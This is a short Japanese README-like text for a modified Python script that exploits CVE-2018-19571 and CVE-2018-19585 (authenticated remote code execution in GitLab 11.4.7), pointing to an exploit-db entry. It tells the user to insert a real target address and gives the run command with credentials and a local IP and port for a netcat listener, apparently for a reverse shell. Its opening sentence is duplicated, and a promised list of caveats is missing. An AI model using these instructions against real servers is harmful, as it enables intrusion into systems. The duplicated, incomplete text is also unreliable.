
CVE-2018-19571およびCVE-2018-19585(GitLab 11.4.7 - 認証済みリモートコード実行)を悪用するPythonスクリプトの修正版で、https://www.exploit-db.com/exploits/49263 で入手できます(Python 3.9)。
CVE-2018-19571 および CVE-2018-19585 (GitLab 11.4.7 - 認証済みリモートコード実行) を悪用する Python スクリプトの修正版です。https://www.exploit-db.com/exploits/49263 (Python 3.9) で公開されているものです。
スクリプトを編集し、そこに記載されているターゲットアドレスを実際のターゲットアドレスに置き換えてください。
また、以下の点に注意する必要があります。
スクリプトは次のように実行されます:
python3 49263.py -U username -P password -l local-ip -p local-port-for-netcat-listener